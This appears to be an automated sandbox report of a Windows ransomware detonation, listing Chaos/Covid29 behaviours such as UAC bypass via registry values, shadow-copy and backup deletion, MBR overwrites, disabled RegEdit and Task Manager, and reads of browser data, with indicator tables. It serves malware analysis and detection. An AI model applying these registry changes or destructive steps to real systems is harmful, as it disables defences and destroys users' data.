Analysis Overview
Threat Level: Known bad
The file http://google.com was found to be: Known bad.
Malicious Activity Summary
Chaos
Chaos Ransomware
UAC bypass
Deletes shadow copies
Modifies boot configuration data using bcdedit
Manipulates Digital Signatures
Deletes backup catalog
Downloads MZ/PE file
Disables RegEdit via registry modification
Disables Task Manager via registry modification
Executes dropped EXE
Checks computer location settings
UPX packed file
Drops startup file
Reads user/profile data of web browsers
Drops desktop.ini file(s)
Writes to the Master Boot Record (MBR)
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
AutoIT Executable
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Program crash
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Modifies Internet Explorer start page
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Suspicious behavior: AddClipboardFormatListener
Runs ping.exe
Interacts with shadow copies
Kills process with taskkill
NTFS ADS
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Modifies registry key
Suspicious use of SendNotifyMessage
Checks processor information in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-03 05:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-03 05:32
Reported
2024-07-03 05:44
Platform
win10v2004-20240611-en
Max time kernel
715s
Max time network
716s
Command Line
Signatures
Chaos
Chaos Ransomware
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" | C:\Windows\SysWOW64\certutil.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29Cry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-200405930-3877336739-3533750831-1000\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\7D12.tmp\mbr.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe | N/A |
AutoIT Executable
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0gsi5uxfx.jpg" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\bootcfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 | C:\Windows\SysWOW64\bootcfg.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\chkdsk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\chkntfs.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "https://www.youtube.com/@JhoPro" | C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "205" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\껟â¾â€€è€€ | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-200405930-3877336739-3533750831-1000\{CF4986AB-31E7-4B35-AF79-CEE6F78E6AF9} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 5a00310000000000e358092c100053797374656d33320000420009000400efbe874f7748e358092c2e000000b90c000000000100000000000000000000000000000073770e01530079007300740065006d0033003200000018000000 | C:\Windows\SysWOW64\certreq.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0\NodeSlot = "6" | C:\Windows\SysWOW64\certreq.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\껟â¾â€€è€€\ = "md_auto_file" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).right = "1050" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell\SniffedFolderType = "Generic" | C:\Windows\SysWOW64\certreq.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\md_auto_file\shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).bottom = "650" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff | C:\Windows\SysWOW64\certreq.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2 = 5c00320088ea0000e358672d20005369676d612e7a697000440009000400efbee358672de358682d2e00000000000000000000000000000000000000000000000000832aa4005300690067006d0061002e007a0069007000000018000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WinPos1280x720x96(1).left = "250" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | C:\Windows\SysWOW64\certreq.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\SysWOW64\certreq.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupByDirection = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\NodeSlot = "7" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874385" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Rev = "0" | C:\Windows\explorer.exe | N/A |
